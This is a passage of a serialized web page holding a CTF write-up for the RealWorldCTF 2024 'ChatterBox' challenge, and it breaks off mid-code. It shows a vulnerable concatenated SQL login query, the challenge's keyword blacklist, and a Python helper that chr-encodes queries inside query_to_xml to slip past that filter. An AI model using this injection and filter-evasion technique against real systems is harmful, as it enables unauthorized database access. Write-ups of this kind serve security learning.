[{"data":1,"prerenderedAt":4191},["ShallowReactive",2],{"content-query-ZwukyG4Bas":3},{"_path":4,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":8,"description":7,"head":9,"body":28,"_type":4185,"_id":4186,"_source":4187,"_file":4188,"_stem":4189,"_extension":4190},"/writeups/chatter-box","writeups",false,"","ChatterBox",{"title":10,"description":11,"keywords":12,"slug":13,"image":14,"date":15,"meta":16},"ChatterBox [UNINTENDED]","ChatterBox was a medium web challenge from RealWorldCTF 2024.","web,sqli,rce","chatter-box","https://res.cloudinary.com/dmju5zuhr/image/upload/v1706549525/writeups/real_world_ctf.webp","2024-01-27",[17,18,19,20,22,24,25,26],{"og:image":14},{"og:title":10},{"og:description":11},{"og:type":21},"article",{"og:url":23},"https://owalid.com/chatter-box",{"description":11},{"title":10},{"keywords":27},"web,sqli,rce,realworldctf,realworld,ctf,ChatterBox",{"type":29,"children":30,"toc":4178},"root",[31,39,46,51,56,62,67,347,353,358,363,389,394,400,405,487,492,496,503,508,513,525,530,535,539,544,549,554,799,805,810,823,1250,1255,1823,1849,1854,1866,2277,2282,2287,2362,2383,2410,2415,2426,2447,2497,2509,2514,2525,2538,2549,2554,2600,2605,2609,2615,2620,2631,2651,2656,2661,2667,2672,2677,2697,2702,2723,2734,2739,2744,2748,2753,2759,2771,2776,2780,2785,2790,2840,2845,2849,2854,2859,2927,2931,2935,2948,2953,3020,3025,3031,3036,3044,3546,3554,3994,4002,4143,4163,4168,4172],{"type":32,"tag":33,"props":34,"children":36},"element","h1",{"id":35},"chatterbox",[37],{"type":38,"value":8},"text",{"type":32,"tag":40,"props":41,"children":43},"h2",{"id":42},"introduction",[44],{"type":38,"value":45},"Introduction",{"type":32,"tag":47,"props":48,"children":49},"p",{},[50],{"type":38,"value":11},{"type":32,"tag":47,"props":52,"children":53},{},[54],{"type":38,"value":55},"We have the compiled source code in the form of a .jar 
file.",{"type":32,"tag":57,"props":58,"children":61},"custom-image",{"imgSrc":59,":width":60},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1706558660/writeups/chatter-box/files.webp","330",[],{"type":32,"tag":47,"props":63,"children":64},{},[65],{"type":38,"value":66},"If we look at the dockerfile in detail, we can see that an elf file /readflag is copied so we can therefore say that the goal of the challenge is to rce on the target server",{"type":32,"tag":68,"props":69,"children":71},"code-card",{"lang":70},"docker",[72],{"type":32,"tag":73,"props":74,"children":77},"pre",{"code":75,"language":70,"meta":7,"className":76,"style":7},"FROM openjdk:17-slim\n\nRUN apt update \\\n    && apt install -y postgresql postgresql-contrib uuid vim gcc postgresql-13 postgresql-server-dev-13 file procps &&  apt install sudo -y\nRUN apt install -y libfindbin-libs-perl acl haveged\nRUN mkdir -p /logs && touch /logs/myapp.log && chmod 777 /logs/ && chmod 777 /logs/myapp.log\n\nCOPY init.sql /\nCOPY payload.c /tmp/\n\nUSER root\nUSER root\n\nCOPY ChatterBox-0.0.1-SNAPSHOT.jar /\nCOPY readflag /\nCOPY flag /\n\nRUN chmod 000 /flag\nCOPY start.sh /\nRUN chmod +x /start.sh\nENTRYPOINT [\"/start.sh\"]\n","language-docker shiki shiki-themes vitesse-dark",[78],{"type":32,"tag":79,"props":80,"children":81},"code",{"__ignoreMap":7},[82,100,110,124,133,146,159,167,181,194,202,216,228,236,249,262,275,283,296,309,322],{"type":32,"tag":83,"props":84,"children":87},"span",{"class":85,"line":86},"line",1,[88,94],{"type":32,"tag":83,"props":89,"children":91},{"style":90},"--shiki-default:#4D9375",[92],{"type":38,"value":93},"FROM",{"type":32,"tag":83,"props":95,"children":97},{"style":96},"--shiki-default:#DBD7CAEE",[98],{"type":38,"value":99}," 
openjdk:17-slim\n",{"type":32,"tag":83,"props":101,"children":103},{"class":85,"line":102},2,[104],{"type":32,"tag":83,"props":105,"children":107},{"emptyLinePlaceholder":106},true,[108],{"type":38,"value":109},"\n",{"type":32,"tag":83,"props":111,"children":113},{"class":85,"line":112},3,[114,119],{"type":32,"tag":83,"props":115,"children":116},{"style":90},[117],{"type":38,"value":118},"RUN",{"type":32,"tag":83,"props":120,"children":121},{"style":96},[122],{"type":38,"value":123}," apt update \\\n",{"type":32,"tag":83,"props":125,"children":127},{"class":85,"line":126},4,[128],{"type":32,"tag":83,"props":129,"children":130},{"style":96},[131],{"type":38,"value":132},"    && apt install -y postgresql postgresql-contrib uuid vim gcc postgresql-13 postgresql-server-dev-13 file procps &&  apt install sudo -y\n",{"type":32,"tag":83,"props":134,"children":136},{"class":85,"line":135},5,[137,141],{"type":32,"tag":83,"props":138,"children":139},{"style":90},[140],{"type":38,"value":118},{"type":32,"tag":83,"props":142,"children":143},{"style":96},[144],{"type":38,"value":145}," apt install -y libfindbin-libs-perl acl haveged\n",{"type":32,"tag":83,"props":147,"children":149},{"class":85,"line":148},6,[150,154],{"type":32,"tag":83,"props":151,"children":152},{"style":90},[153],{"type":38,"value":118},{"type":32,"tag":83,"props":155,"children":156},{"style":96},[157],{"type":38,"value":158}," mkdir -p /logs && touch /logs/myapp.log && chmod 777 /logs/ && chmod 777 /logs/myapp.log\n",{"type":32,"tag":83,"props":160,"children":162},{"class":85,"line":161},7,[163],{"type":32,"tag":83,"props":164,"children":165},{"emptyLinePlaceholder":106},[166],{"type":38,"value":109},{"type":32,"tag":83,"props":168,"children":170},{"class":85,"line":169},8,[171,176],{"type":32,"tag":83,"props":172,"children":173},{"style":90},[174],{"type":38,"value":175},"COPY",{"type":32,"tag":83,"props":177,"children":178},{"style":96},[179],{"type":38,"value":180}," init.sql 
/\n",{"type":32,"tag":83,"props":182,"children":184},{"class":85,"line":183},9,[185,189],{"type":32,"tag":83,"props":186,"children":187},{"style":90},[188],{"type":38,"value":175},{"type":32,"tag":83,"props":190,"children":191},{"style":96},[192],{"type":38,"value":193}," payload.c /tmp/\n",{"type":32,"tag":83,"props":195,"children":197},{"class":85,"line":196},10,[198],{"type":32,"tag":83,"props":199,"children":200},{"emptyLinePlaceholder":106},[201],{"type":38,"value":109},{"type":32,"tag":83,"props":203,"children":205},{"class":85,"line":204},11,[206,211],{"type":32,"tag":83,"props":207,"children":208},{"style":90},[209],{"type":38,"value":210},"USER",{"type":32,"tag":83,"props":212,"children":213},{"style":96},[214],{"type":38,"value":215}," root\n",{"type":32,"tag":83,"props":217,"children":219},{"class":85,"line":218},12,[220,224],{"type":32,"tag":83,"props":221,"children":222},{"style":90},[223],{"type":38,"value":210},{"type":32,"tag":83,"props":225,"children":226},{"style":96},[227],{"type":38,"value":215},{"type":32,"tag":83,"props":229,"children":231},{"class":85,"line":230},13,[232],{"type":32,"tag":83,"props":233,"children":234},{"emptyLinePlaceholder":106},[235],{"type":38,"value":109},{"type":32,"tag":83,"props":237,"children":239},{"class":85,"line":238},14,[240,244],{"type":32,"tag":83,"props":241,"children":242},{"style":90},[243],{"type":38,"value":175},{"type":32,"tag":83,"props":245,"children":246},{"style":96},[247],{"type":38,"value":248}," ChatterBox-0.0.1-SNAPSHOT.jar /\n",{"type":32,"tag":83,"props":250,"children":252},{"class":85,"line":251},15,[253,257],{"type":32,"tag":83,"props":254,"children":255},{"style":90},[256],{"type":38,"value":175},{"type":32,"tag":83,"props":258,"children":259},{"style":96},[260],{"type":38,"value":261}," readflag 
/\n",{"type":32,"tag":83,"props":263,"children":265},{"class":85,"line":264},16,[266,270],{"type":32,"tag":83,"props":267,"children":268},{"style":90},[269],{"type":38,"value":175},{"type":32,"tag":83,"props":271,"children":272},{"style":96},[273],{"type":38,"value":274}," flag /\n",{"type":32,"tag":83,"props":276,"children":278},{"class":85,"line":277},17,[279],{"type":32,"tag":83,"props":280,"children":281},{"emptyLinePlaceholder":106},[282],{"type":38,"value":109},{"type":32,"tag":83,"props":284,"children":286},{"class":85,"line":285},18,[287,291],{"type":32,"tag":83,"props":288,"children":289},{"style":90},[290],{"type":38,"value":118},{"type":32,"tag":83,"props":292,"children":293},{"style":96},[294],{"type":38,"value":295}," chmod 000 /flag\n",{"type":32,"tag":83,"props":297,"children":299},{"class":85,"line":298},19,[300,304],{"type":32,"tag":83,"props":301,"children":302},{"style":90},[303],{"type":38,"value":175},{"type":32,"tag":83,"props":305,"children":306},{"style":96},[307],{"type":38,"value":308}," start.sh /\n",{"type":32,"tag":83,"props":310,"children":312},{"class":85,"line":311},20,[313,317],{"type":32,"tag":83,"props":314,"children":315},{"style":90},[316],{"type":38,"value":118},{"type":32,"tag":83,"props":318,"children":319},{"style":96},[320],{"type":38,"value":321}," chmod +x /start.sh\n",{"type":32,"tag":83,"props":323,"children":325},{"class":85,"line":324},21,[326,331,336,342],{"type":32,"tag":83,"props":327,"children":328},{"style":90},[329],{"type":38,"value":330},"ENTRYPOINT",{"type":32,"tag":83,"props":332,"children":333},{"style":96},[334],{"type":38,"value":335}," 
[",{"type":32,"tag":83,"props":337,"children":339},{"style":338},"--shiki-default:#C98A7D",[340],{"type":38,"value":341},"\"/start.sh\"",{"type":32,"tag":83,"props":343,"children":344},{"style":96},[345],{"type":38,"value":346},"]\n",{"type":32,"tag":40,"props":348,"children":350},{"id":349},"recon",[351],{"type":38,"value":352},"Recon",{"type":32,"tag":57,"props":354,"children":357},{"imgSrc":355,":width":356},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1706558732/writeups/chatter-box/files_decompiled.webp","500",[],{"type":32,"tag":47,"props":359,"children":360},{},[361],{"type":38,"value":362},"After decompiling the .jar file, we can see that there are 3 controllers:",{"type":32,"tag":364,"props":365,"children":366},"ul",{},[367,373,378],{"type":32,"tag":368,"props":369,"children":370},"li",{},[371],{"type":38,"value":372},"LoginController: This controller allows a user to connect.",{"type":32,"tag":368,"props":374,"children":375},{},[376],{"type":38,"value":377},"MessageBoardController: Allows adding a message to the database and displaying the list of messages.",{"type":32,"tag":368,"props":379,"children":380},{},[381,383],{"type":38,"value":382},"NotifyController: Allows rendering an html file via the filename passed as parameter ",{"type":32,"tag":79,"props":384,"children":386},{"className":385},[],[387],{"type":38,"value":388},"fname",{"type":32,"tag":47,"props":390,"children":391},{},[392],{"type":38,"value":393},"In the initialization of the database, we can see that there is an admin user with the id 1. 
Once connected, this user is able to interact with the two controllers \"MessageBoardController\" and \"NotifyController\".",{"type":32,"tag":40,"props":395,"children":397},{"id":396},"sql-injection",[398],{"type":38,"value":399},"SQL Injection",{"type":32,"tag":47,"props":401,"children":402},{},[403],{"type":38,"value":404},"By looking in detail at the Login controller, we can see that the endpoint allowing the user to connect contained an SQL injection.",{"type":32,"tag":68,"props":406,"children":408},{"lang":407},"java",[409],{"type":32,"tag":73,"props":410,"children":413},{"code":411,"language":407,"meta":7,"className":412,"style":7},"String sql = \"SELECT id,passwd FROM message_users WHERE username = '\" + username + \"'\";\n","language-java shiki shiki-themes vitesse-dark",[414],{"type":32,"tag":79,"props":415,"children":416},{"__ignoreMap":7},[417],{"type":32,"tag":83,"props":418,"children":419},{"class":85,"line":86},[420,425,431,437,443,448,453,459,464,469,473,478,482],{"type":32,"tag":83,"props":421,"children":422},{"style":96},[423],{"type":38,"value":424},"String",{"type":32,"tag":83,"props":426,"children":428},{"style":427},"--shiki-default:#BD976A",[429],{"type":38,"value":430}," sql",{"type":32,"tag":83,"props":432,"children":434},{"style":433},"--shiki-default:#666666",[435],{"type":38,"value":436}," =",{"type":32,"tag":83,"props":438,"children":440},{"style":439},"--shiki-default:#C98A7D77",[441],{"type":38,"value":442}," \"",{"type":32,"tag":83,"props":444,"children":445},{"style":338},[446],{"type":38,"value":447},"SELECT id,passwd FROM message_users WHERE username = '",{"type":32,"tag":83,"props":449,"children":450},{"style":439},[451],{"type":38,"value":452},"\"",{"type":32,"tag":83,"props":454,"children":456},{"style":455},"--shiki-default:#CB7676",[457],{"type":38,"value":458}," +",{"type":32,"tag":83,"props":460,"children":461},{"style":96},[462],{"type":38,"value":463}," username 
",{"type":32,"tag":83,"props":465,"children":466},{"style":455},[467],{"type":38,"value":468},"+",{"type":32,"tag":83,"props":470,"children":471},{"style":439},[472],{"type":38,"value":442},{"type":32,"tag":83,"props":474,"children":475},{"style":338},[476],{"type":38,"value":477},"'",{"type":32,"tag":83,"props":479,"children":480},{"style":439},[481],{"type":38,"value":452},{"type":32,"tag":83,"props":483,"children":484},{"style":433},[485],{"type":38,"value":486},";\n",{"type":32,"tag":47,"props":488,"children":489},{},[490],{"type":38,"value":491},"The only problem is that we have to bypass several checks:",{"type":32,"tag":57,"props":493,"children":495},{"imgSrc":494},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1706558895/writeups/chatter-box/login_controller.webp",[],{"type":32,"tag":497,"props":498,"children":500},"h3",{"id":499},"bypass-first-check-blacklist",[501],{"type":38,"value":502},"Bypass first check (blacklist)",{"type":32,"tag":47,"props":504,"children":505},{},[506],{"type":38,"value":507},"The first check is a blacklist check.",{"type":32,"tag":47,"props":509,"children":510},{},[511],{"type":38,"value":512},"The blacklist constitutes a large part of keywords usable in an 
injection.",{"type":32,"tag":68,"props":514,"children":516},{"lang":515},"txt",[517],{"type":32,"tag":73,"props":518,"children":520},{"code":519},"\"SELECT\",\"UNION\",\"INSERT\",\"ALTER\",\"SLEEP\",\"DELETE\",\"--\",\";\",\"#\",\"&\",\"/*\",\"OR\",\"EXEC\",\"CREATE\",\"AND\",\"DROP\",\n\"DO\",\"COPY\",\"SET\",\"VACUUM\",\"SHOW\",\"CURSOR\",\"TRUNCATE\",\"CAST\",\"BEGIN\",\"PERFORM\",\"END\",\"CASE\",\"WHEN\",\"ALL\",\n\"TABLE\",\"UPDATE\",\"TRIGGER\",\"FUNCTION\",\"PROCEDURE\",\"DECLARE\",\"RETURNING\",\"TABLESPACE\",\"VIEW\",\"SEQUENCE\",\n\"INDEX\",\"LOCK\",\"GRANT\",\"REVOKE\",\"SAVEPOINT\",\"ROLLBACK\",\"IMPORT\",\"COMMIT\",\"PREPARE\",\"EXECUTE\",\"EXPLAIN\",\n\"ANALYZE\",\"DATABASE\",\"PASSWORD\",\"CONNECT\",\"DISCONNECT\",\"PG_SLEEP\",\"MERGE\",\"USING\",\"LIMIT\",\"OFFSET\",\"RETURN\",\n\"ESCAPE\",\"LIKE\",\"ILIKE\",\"RLIKE\",\"EXISTS\",\"BETWEEN\",\"IS\",\"NULL\",\"NOT\",\"GROUP\",\"BY\",\"HAVING\",\"ORDER\",\"WINDOW\",\n\"PARTITION\",\"OVER\",\"FOREIGN KEY\",\"REFERENCE\",\"RAISE\",\"LISTEN\",\"NOTIFY\",\"LOAD\",\"SECURITY\",\"OWNER\",\"RULE\",\n\"CLUSTER\",\"COMMENT\",\"CONVERT\",\"COPY\",\"CHECKPOINT\",\"REINDEX\",\"RESET\",\"LANGUAGE\",\"PLPGSQL\",\"PLPYTHON\",\n\"SECDEF\",\"NOCREATEDB\",\"NOCREATEROLE\",\"NOINHERIT\",\"NOREPLICATION\",\"BYPASSRLS\",\"FILE\",\"PG_\",\"IMPORT\",\"EXPORT\"\n",[521],{"type":32,"tag":79,"props":522,"children":523},{"__ignoreMap":7},[524],{"type":38,"value":519},{"type":32,"tag":47,"props":526,"children":527},{},[528],{"type":38,"value":529},"One of the most restrictive things is that in the blacklist, it is forbidden to use comments.",{"type":32,"tag":47,"props":531,"children":532},{},[533],{"type":38,"value":534},"We need to use a postgresql function that would allow us to execute a query without it being in the 
blacklist.",{"type":32,"tag":57,"props":536,"children":538},{"imgSrc":537},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1706558929/writeups/chatter-box/doc_query_to_xml.webp",[],{"type":32,"tag":47,"props":540,"children":541},{},[542],{"type":38,"value":543},"As shown in the postgresql documentation, the query_to_xml function allows you to execute a query passed as a parameter and return the result in xml format.",{"type":32,"tag":47,"props":545,"children":546},{},[547],{"type":38,"value":548},"And bingo !!! This function is not on the blacklist.",{"type":32,"tag":47,"props":550,"children":551},{},[552],{"type":38,"value":553},"For ease, here is a small python code that allows to generate a payload via a sql query. By encoding the request with CHR.",{"type":32,"tag":68,"props":555,"children":557},{"lang":556},"python",[558],{"type":32,"tag":73,"props":559,"children":562},{"code":560,"language":556,"meta":7,"className":561,"style":7},"def get_payload(query):\n    payload_chr = [\"||\".join(f\"chr({ord(query[i])})\" for i in range(0, len(query)))][0]\n    print(f\"'query_to_xml({payload_chr},true,true,'')'\")\n","language-python shiki shiki-themes vitesse-dark",[563],{"type":32,"tag":79,"props":564,"children":565},{"__ignoreMap":7},[566,595,755],{"type":32,"tag":83,"props":567,"children":568},{"class":85,"line":86},[569,574,580,585,590],{"type":32,"tag":83,"props":570,"children":571},{"style":455},[572],{"type":38,"value":573},"def",{"type":32,"tag":83,"props":575,"children":577},{"style":576},"--shiki-default:#80A665",[578],{"type":38,"value":579}," 
get_payload",{"type":32,"tag":83,"props":581,"children":582},{"style":433},[583],{"type":38,"value":584},"(",{"type":32,"tag":83,"props":586,"children":587},{"style":96},[588],{"type":38,"value":589},"query",{"type":32,"tag":83,"props":591,"children":592},{"style":433},[593],{"type":38,"value":594},"):\n",{"type":32,"tag":83,"props":596,"children":597},{"class":85,"line":102},[598,603,608,612,616,621,625,630,635,639,644,649,655,661,665,669,674,679,684,689,694,699,704,709,714,718,724,729,734,738,742,747,751],{"type":32,"tag":83,"props":599,"children":600},{"style":96},[601],{"type":38,"value":602},"    payload_chr ",{"type":32,"tag":83,"props":604,"children":605},{"style":433},[606],{"type":38,"value":607},"=",{"type":32,"tag":83,"props":609,"children":610},{"style":433},[611],{"type":38,"value":335},{"type":32,"tag":83,"props":613,"children":614},{"style":439},[615],{"type":38,"value":452},{"type":32,"tag":83,"props":617,"children":618},{"style":338},[619],{"type":38,"value":620},"||",{"type":32,"tag":83,"props":622,"children":623},{"style":439},[624],{"type":38,"value":452},{"type":32,"tag":83,"props":626,"children":627},{"style":433},[628],{"type":38,"value":629},".",{"type":32,"tag":83,"props":631,"children":632},{"style":96},[633],{"type":38,"value":634},"join",{"type":32,"tag":83,"props":636,"children":637},{"style":433},[638],{"type":38,"value":584},{"type":32,"tag":83,"props":640,"children":641},{"style":455},[642],{"type":38,"value":643},"f",{"type":32,"tag":83,"props":645,"children":646},{"style":338},[647],{"type":38,"value":648},"\"chr(",{"type":32,"tag":83,"props":650,"children":652},{"style":651},"--shiki-default:#C99076",[653],{"type":38,"value":654},"{",{"type":32,"tag":83,"props":656,"children":658},{"style":657},"--shiki-default:#B8A965",[659],{"type":38,"value":660},"ord",{"type":32,"tag":83,"props":662,"children":663},{"style":433},[664],{"type":38,"value":584},{"type":32,"tag":83,"props":666,"children":667},{"style":96},[668],{"type":38,"value":5
89},{"type":32,"tag":83,"props":670,"children":671},{"style":433},[672],{"type":38,"value":673},"[",{"type":32,"tag":83,"props":675,"children":676},{"style":96},[677],{"type":38,"value":678},"i",{"type":32,"tag":83,"props":680,"children":681},{"style":433},[682],{"type":38,"value":683},"])",{"type":32,"tag":83,"props":685,"children":686},{"style":651},[687],{"type":38,"value":688},"}",{"type":32,"tag":83,"props":690,"children":691},{"style":338},[692],{"type":38,"value":693},")\"",{"type":32,"tag":83,"props":695,"children":696},{"style":90},[697],{"type":38,"value":698}," for",{"type":32,"tag":83,"props":700,"children":701},{"style":96},[702],{"type":38,"value":703}," i ",{"type":32,"tag":83,"props":705,"children":706},{"style":90},[707],{"type":38,"value":708},"in",{"type":32,"tag":83,"props":710,"children":711},{"style":657},[712],{"type":38,"value":713}," range",{"type":32,"tag":83,"props":715,"children":716},{"style":433},[717],{"type":38,"value":584},{"type":32,"tag":83,"props":719,"children":721},{"style":720},"--shiki-default:#4C9A91",[722],{"type":38,"value":723},"0",{"type":32,"tag":83,"props":725,"children":726},{"style":433},[727],{"type":38,"value":728},",",{"type":32,"tag":83,"props":730,"children":731},{"style":657},[732],{"type":38,"value":733}," len",{"type":32,"tag":83,"props":735,"children":736},{"style":433},[737],{"type":38,"value":584},{"type":32,"tag":83,"props":739,"children":740},{"style":96},[741],{"type":38,"value":589},{"type":32,"tag":83,"props":743,"children":744},{"style":433},[745],{"type":38,"value":746},")))][",{"type":32,"tag":83,"props":748,"children":749},{"style":720},[750],{"type":38,"value":723},{"type":32,"tag":83,"props":752,"children":753},{"style":433},[754],{"type":38,"value":346},{"type":32,"tag":83,"props":756,"children":757},{"class":85,"line":112},[758,763,767,771,776,780,785,789,794],{"type":32,"tag":83,"props":759,"children":760},{"style":657},[761],{"type":38,"value":762},"    
print",{"type":32,"tag":83,"props":764,"children":765},{"style":433},[766],{"type":38,"value":584},{"type":32,"tag":83,"props":768,"children":769},{"style":455},[770],{"type":38,"value":643},{"type":32,"tag":83,"props":772,"children":773},{"style":338},[774],{"type":38,"value":775},"\"'query_to_xml(",{"type":32,"tag":83,"props":777,"children":778},{"style":651},[779],{"type":38,"value":654},{"type":32,"tag":83,"props":781,"children":782},{"style":96},[783],{"type":38,"value":784},"payload_chr",{"type":32,"tag":83,"props":786,"children":787},{"style":651},[788],{"type":38,"value":688},{"type":32,"tag":83,"props":790,"children":791},{"style":338},[792],{"type":38,"value":793},",true,true,'')'\"",{"type":32,"tag":83,"props":795,"children":796},{"style":433},[797],{"type":38,"value":798},")\n",{"type":32,"tag":497,"props":800,"children":802},{"id":801},"bypass-second-check",[803],{"type":38,"value":804},"Bypass second check",{"type":32,"tag":47,"props":806,"children":807},{},[808],{"type":38,"value":809},"So now we have a function that executes the query we want. But the problem now is that another check is applied after the blacklist.",{"type":32,"tag":47,"props":811,"children":812},{},[813,815,821],{"type":38,"value":814},"The second filter will call the ",{"type":32,"tag":79,"props":816,"children":818},{"className":817},[],[819],{"type":38,"value":820},"parse",{"type":38,"value":822}," function. 
This function will process a check depending on whether the query is of type 'select' or 'insert’.",{"type":32,"tag":68,"props":824,"children":825},{"lang":407},[826],{"type":32,"tag":73,"props":827,"children":829},{"code":828,"language":407,"meta":7,"className":412,"style":7},"public static boolean parse(String sql) {\n  try {\n      CCJSqlParserManager parserManager = new CCJSqlParserManager();\n      Statement statement = parserManager.parse(new StringReader(sql));\n      if (statement instanceof Select) {\n        return processSelect((Select)statement);\n      } else {\n        return statement instanceof Insert ? processInsert((Insert)statement) : false;\n      }\n  } catch (Exception var3) {\n    var3.printStackTrace();\n      throw new SQLException(\"SQL error\");\n  }\n}\n",[830],{"type":32,"tag":79,"props":831,"children":832},{"__ignoreMap":7},[833,875,887,919,976,1012,1049,1066,1132,1140,1175,1196,1234,1242],{"type":32,"tag":83,"props":834,"children":835},{"class":85,"line":86},[836,841,846,851,856,860,865,870],{"type":32,"tag":83,"props":837,"children":838},{"style":455},[839],{"type":38,"value":840},"public",{"type":32,"tag":83,"props":842,"children":843},{"style":455},[844],{"type":38,"value":845}," static",{"type":32,"tag":83,"props":847,"children":848},{"style":455},[849],{"type":38,"value":850}," boolean",{"type":32,"tag":83,"props":852,"children":853},{"style":576},[854],{"type":38,"value":855}," parse",{"type":32,"tag":83,"props":857,"children":858},{"style":433},[859],{"type":38,"value":584},{"type":32,"tag":83,"props":861,"children":862},{"style":96},[863],{"type":38,"value":864},"String sql",{"type":32,"tag":83,"props":866,"children":867},{"style":433},[868],{"type":38,"value":869},")",{"type":32,"tag":83,"props":871,"children":872},{"style":433},[873],{"type":38,"value":874}," 
{\n",{"type":32,"tag":83,"props":876,"children":877},{"class":85,"line":102},[878,883],{"type":32,"tag":83,"props":879,"children":880},{"style":90},[881],{"type":38,"value":882},"  try",{"type":32,"tag":83,"props":884,"children":885},{"style":433},[886],{"type":38,"value":874},{"type":32,"tag":83,"props":888,"children":889},{"class":85,"line":112},[890,895,900,904,909,914],{"type":32,"tag":83,"props":891,"children":892},{"style":96},[893],{"type":38,"value":894},"      CCJSqlParserManager",{"type":32,"tag":83,"props":896,"children":897},{"style":427},[898],{"type":38,"value":899}," parserManager",{"type":32,"tag":83,"props":901,"children":902},{"style":433},[903],{"type":38,"value":436},{"type":32,"tag":83,"props":905,"children":906},{"style":90},[907],{"type":38,"value":908}," new",{"type":32,"tag":83,"props":910,"children":911},{"style":576},[912],{"type":38,"value":913}," CCJSqlParserManager",{"type":32,"tag":83,"props":915,"children":916},{"style":433},[917],{"type":38,"value":918},"();\n",{"type":32,"tag":83,"props":920,"children":921},{"class":85,"line":126},[922,927,932,936,940,944,948,952,957,962,966,971],{"type":32,"tag":83,"props":923,"children":924},{"style":96},[925],{"type":38,"value":926},"      Statement",{"type":32,"tag":83,"props":928,"children":929},{"style":427},[930],{"type":38,"value":931}," statement",{"type":32,"tag":83,"props":933,"children":934},{"style":433},[935],{"type":38,"value":436},{"type":32,"tag":83,"props":937,"children":938},{"style":427},[939],{"type":38,"value":899},{"type":32,"tag":83,"props":941,"children":942},{"style":433},[943],{"type":38,"value":629},{"type":32,"tag":83,"props":945,"children":946},{"style":576},[947],{"type":38,"value":820},{"type":32,"tag":83,"props":949,"children":950},{"style":433},[951],{"type":38,"value":584},{"type":32,"tag":83,"props":953,"children":954},{"style":90},[955],{"type":38,"value":956},"new",{"type":32,"tag":83,"props":958,"children":959},{"style":576},[960],{"type":38,"value":961}," 
StringReader",{"type":32,"tag":83,"props":963,"children":964},{"style":433},[965],{"type":38,"value":584},{"type":32,"tag":83,"props":967,"children":968},{"style":96},[969],{"type":38,"value":970},"sql",{"type":32,"tag":83,"props":972,"children":973},{"style":433},[974],{"type":38,"value":975},"));\n",{"type":32,"tag":83,"props":977,"children":978},{"class":85,"line":135},[979,984,989,994,999,1004,1008],{"type":32,"tag":83,"props":980,"children":981},{"style":90},[982],{"type":38,"value":983},"      if",{"type":32,"tag":83,"props":985,"children":986},{"style":433},[987],{"type":38,"value":988}," (",{"type":32,"tag":83,"props":990,"children":991},{"style":96},[992],{"type":38,"value":993},"statement ",{"type":32,"tag":83,"props":995,"children":996},{"style":455},[997],{"type":38,"value":998},"instanceof",{"type":32,"tag":83,"props":1000,"children":1001},{"style":96},[1002],{"type":38,"value":1003}," Select",{"type":32,"tag":83,"props":1005,"children":1006},{"style":433},[1007],{"type":38,"value":869},{"type":32,"tag":83,"props":1009,"children":1010},{"style":433},[1011],{"type":38,"value":874},{"type":32,"tag":83,"props":1013,"children":1014},{"class":85,"line":148},[1015,1020,1025,1030,1035,1039,1044],{"type":32,"tag":83,"props":1016,"children":1017},{"style":90},[1018],{"type":38,"value":1019},"        return",{"type":32,"tag":83,"props":1021,"children":1022},{"style":576},[1023],{"type":38,"value":1024}," 
processSelect",{"type":32,"tag":83,"props":1026,"children":1027},{"style":433},[1028],{"type":38,"value":1029},"((",{"type":32,"tag":83,"props":1031,"children":1032},{"style":96},[1033],{"type":38,"value":1034},"Select",{"type":32,"tag":83,"props":1036,"children":1037},{"style":433},[1038],{"type":38,"value":869},{"type":32,"tag":83,"props":1040,"children":1041},{"style":96},[1042],{"type":38,"value":1043},"statement",{"type":32,"tag":83,"props":1045,"children":1046},{"style":433},[1047],{"type":38,"value":1048},");\n",{"type":32,"tag":83,"props":1050,"children":1051},{"class":85,"line":161},[1052,1057,1062],{"type":32,"tag":83,"props":1053,"children":1054},{"style":433},[1055],{"type":38,"value":1056},"      }",{"type":32,"tag":83,"props":1058,"children":1059},{"style":90},[1060],{"type":38,"value":1061}," else",{"type":32,"tag":83,"props":1063,"children":1064},{"style":433},[1065],{"type":38,"value":874},{"type":32,"tag":83,"props":1067,"children":1068},{"class":85,"line":169},[1069,1073,1078,1082,1087,1092,1097,1101,1106,1110,1114,1118,1123,1128],{"type":32,"tag":83,"props":1070,"children":1071},{"style":90},[1072],{"type":38,"value":1019},{"type":32,"tag":83,"props":1074,"children":1075},{"style":96},[1076],{"type":38,"value":1077}," statement ",{"type":32,"tag":83,"props":1079,"children":1080},{"style":455},[1081],{"type":38,"value":998},{"type":32,"tag":83,"props":1083,"children":1084},{"style":96},[1085],{"type":38,"value":1086}," Insert ",{"type":32,"tag":83,"props":1088,"children":1089},{"style":90},[1090],{"type":38,"value":1091},"?",{"type":32,"tag":83,"props":1093,"children":1094},{"style":576},[1095],{"type":38,"value":1096}," 
processInsert",{"type":32,"tag":83,"props":1098,"children":1099},{"style":433},[1100],{"type":38,"value":1029},{"type":32,"tag":83,"props":1102,"children":1103},{"style":96},[1104],{"type":38,"value":1105},"Insert",{"type":32,"tag":83,"props":1107,"children":1108},{"style":433},[1109],{"type":38,"value":869},{"type":32,"tag":83,"props":1111,"children":1112},{"style":96},[1113],{"type":38,"value":1043},{"type":32,"tag":83,"props":1115,"children":1116},{"style":433},[1117],{"type":38,"value":869},{"type":32,"tag":83,"props":1119,"children":1120},{"style":90},[1121],{"type":38,"value":1122}," :",{"type":32,"tag":83,"props":1124,"children":1125},{"style":90},[1126],{"type":38,"value":1127}," false",{"type":32,"tag":83,"props":1129,"children":1130},{"style":433},[1131],{"type":38,"value":486},{"type":32,"tag":83,"props":1133,"children":1134},{"class":85,"line":183},[1135],{"type":32,"tag":83,"props":1136,"children":1137},{"style":433},[1138],{"type":38,"value":1139},"      }\n",{"type":32,"tag":83,"props":1141,"children":1142},{"class":85,"line":196},[1143,1148,1153,1157,1162,1167,1171],{"type":32,"tag":83,"props":1144,"children":1145},{"style":433},[1146],{"type":38,"value":1147},"  }",{"type":32,"tag":83,"props":1149,"children":1150},{"style":90},[1151],{"type":38,"value":1152}," catch",{"type":32,"tag":83,"props":1154,"children":1155},{"style":433},[1156],{"type":38,"value":988},{"type":32,"tag":83,"props":1158,"children":1159},{"style":96},[1160],{"type":38,"value":1161},"Exception 